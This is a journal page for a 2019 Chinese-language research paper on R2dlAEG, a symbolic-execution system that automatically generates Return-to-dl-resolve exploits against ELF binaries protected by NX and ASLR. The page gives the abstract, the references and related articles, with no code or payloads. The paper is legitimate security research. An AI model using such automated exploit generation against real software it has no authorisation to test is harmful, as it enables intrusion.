计算机科学 ›› 2019, Vol. 46 ›› Issue (2): 127-132.doi: 10.11896/j.issn.1002-137X.2019.02.020
方皓, 吴礼发, 吴志勇
FANG Hao, WU Li-fa, WU Zhi-yong
摘要: Return-to-dl-resolve是一种可突破复杂防护机制的通用漏洞利用技术,目前主要以手工方式实现,研究人员需要深入分析并理解ELF动态链接原理,泄露并解析任意库函数的地址,拼装攻击载荷,效率非常低。文中提出了一种基于符号执行的Return-to-dl-resolve自动化实现方法,该方法为ELF可执行文件提供符号执行环境,对程序崩溃点的符号状态进行约束,通过约束求解器对约束进行求解,实现了Return-to-dl-resolve利用代码自动生成系统R2dlAEG。实验结果表明,R2dlAEG可快速构造利用代码,并能够在NX和ASLR防护机制同时开启的条件下劫持程序的控制流。
中图分类号:
[1]LIU J,SU P R,YANG M,et al.Software and Cyber Security—A Survey[J].Journal of Software,2017,28(7):42-68.(in Chinese) 刘剑,苏普睿,杨珉,等.软件与网络安全研究综述[J].软件学报,2017,28(7):42-68. [2]BRUMLEY D,POOSANKAM P,SONG D,et al.Automatic Patch-Based Exploit Generation is Possible:Techniques and Implications[C]∥IEEE Symposium on Security & Privacy.2008. [3]AVGERINOS T,SANG K C,HAO B L T,et al.AEG:Automatic Exploit Generation[J].Internet Society,2011,57(2):74-84. [4]SANG K C,AVGERINOS T,REBERT A,et al.Unleashing Mayhem on Binary Code[C]∥Security and Privacy.IEEE,2012:380-394. [5]STEPHENS N,GROSEN J,SALLS C,et al.Driller:Augmenting Fuzzing Through Selective Symbolic Execution[C]∥ Network and Distributed System Security Symposium.2016. [6]FEDERICO A D,CAMA A,YAN S,et al.How the ELF ruined Christmas[C]∥ Usenix Conference on Security Symposium.USENIX Association,2015:643-658. [7]SCHWARTZ E J,AVGERINOS T,BRUMLEY D.Q:exploit hardening made easy[C]∥ Usenix Conference on Security.USENIX Association,2011:25. [8]WANG M,SU P,LI Q,et al.Automatic Polymorphic Exploit Generation for Software Vulnerabilities[M]∥Security and Privacy in Communication Networks.Springer International Publishing,2013:216-233. [9]王清,张东辉,周浩.Oday安全:软件漏洞分析技术[M].北京:电子工业出版社,2011. [10]俞甲子.程序员的自我修养[M].北京:电子工业出版社,2009:90-132. [11]ORACLE.SYMBOLS[EB/OL]. [2017-12-27].https://docs.oracle.com/cd/E26926_01/html/E25910/chapter6-79797.html. [12]BARTHOLOMEW D.QEMU:a multihost,multitarget emula- tor[M].Belltown Media,2006. [13]YAN S,WANG R,SALLS C,et al.SOK:(State of) The Art of War:Offensive Techniques in Binary Analysis[C]∥ Security and Privacy.IEEE,2016:138-157. [14]SHEN L,DAI K,WANG Z Y.The Non-Sequential Instruction Prefetching Based on Basic Blocks[J].Computer Engineering & Science,2003,25(4):94-98.(in Chinese) 沈立,戴葵,王志英.以基本块为单位的非顺序指令预取[J].计算机工程与科学,2003,25(4):94-98. [15]MOURA L D,BJØRNER N.Z3:An Efficient SMT Solver[M]∥ Tools and Algorithms for the Construction and Analysis of Systems.Springer Berlin Heidelberg,2008:337-340. |
[1] | 李明磊, 黄晖, 陆余良, 朱凯龙. SymFuzz:一种复杂路径条件下的漏洞检测技术 SymFuzz:Vulnerability Detection Technology Under Complex Path Conditions 计算机科学, 2021, 48(5): 25-31. https://doi.org/10.11896/jsjkx.200600128 |
[2] | 周晟伊, 曾红卫. 进化算法与符号执行结合的程序复杂度分析方法 Program Complexity Analysis Method Combining Evolutionary Algorithm with Symbolic Execution 计算机科学, 2021, 48(12): 107-116. https://doi.org/10.11896/jsjkx.210200052 |
[3] | 黄钊,黄曙光,邓兆琨,黄晖. 基于SEH的漏洞自动检测与测试用例生成 Automatic Vulnerability Detection and Test Cases Generation Method for Vulnerabilities Caused by SEH 计算机科学, 2019, 46(7): 133-138. https://doi.org/10.11896/j.issn.1002-137X.2019.07.021 |
[4] | 叶志斌,严波. 符号执行研究综述 Survey of Symbolic Execution 计算机科学, 2018, 45(6A): 28-35. |
[5] | 李航, 臧洌, 甘露. 基于蚁群算法的猜测符号执行的路径搜索 Search of Speculative Symbolic Execution Path Based on Ant Colony Algorithm 计算机科学, 2018, 45(6): 145-150. https://doi.org/10.11896/j.issn.1002-137X.2018.06.025 |
[6] | 张婧,周安民,刘亮,贾鹏,刘露平. Crash可利用性分析方法研究综述 Review of Crash Exploitability Analysis Methods 计算机科学, 2018, 45(5): 5-14. https://doi.org/10.11896/j.issn.1002-137X.2018.05.002 |
[7] | 邓兆琨, 陆余良, 朱凯龙, 黄晖. 基于符号执行技术的网络程序漏洞检测系统 Symbolic Execution Technology Based Defect Detection System for Network Programs 计算机科学, 2018, 45(11A): 325-329. |
[8] | 邓维,李兆鹏. 形状分析符号执行引擎中的状态合并 State Merging for Symbolic Execution Engine with Shape Analysis 计算机科学, 2017, 44(2): 209-215. https://doi.org/10.11896/j.issn.1002-137X.2017.02.034 |
[9] | 陈勇,徐超. 基于符号执行和人机交互的自动向量化方法 Symbolic Execution and Human-Machine Interaction Based Auto Vectorization Method 计算机科学, 2016, 43(Z6): 461-466. https://doi.org/10.11896/j.issn.1002-137X.2016.6A.109 |
[10] | 梁家彪,李兆鹏,朱玲,沈咸飞. 支持形状分析的符号执行引擎的设计与实现 Symbolic Execution Engine with Shape Analysis 计算机科学, 2016, 43(3): 193-198. https://doi.org/10.11896/j.issn.1002-137X.2016.03.036 |
[11] | 李华,邢熠,张玉荣. 基于Token选取的OpenStack单一平面网络建模方法 Modeling OpenStack Single Plane Network Based on Token Selection 计算机科学, 2016, 43(11): 66-70. https://doi.org/10.11896/j.issn.1002-137X.2016.11.012 |
[12] | 王志文,黄小龙,王海军,刘烃,俞乐晨. 基于程序切片的测试用例生成系统研究与实现 Program Slicing-guied Test Case Generation System 计算机科学, 2014, 41(9): 71-74. https://doi.org/10.11896/j.issn.1002-137X.2014.09.012 |
[13] | 张亚军,李舟军,廖湘科,蒋瑞成,李海峰. 自动化白盒模糊测试技术研究 Survey of Automated Whitebox Fuzz Testing 计算机科学, 2014, 41(2): 7-10. |
[14] | 陈翔,顾庆,陈道蓄. 回归测试中测试用例集扩充技术研究进展 Research Advances in Test Suite Augmentation for Regression Testing 计算机科学, 2013, 40(6): 8-15. |
[15] | 牛伟纳,丁雪峰,刘智,张小松. 基于符号执行的二进制代码漏洞发现 Vulnerability Finding Using Symbolic Execution on Binary Programs 计算机科学, 2013, 40(10): 119-121. |
|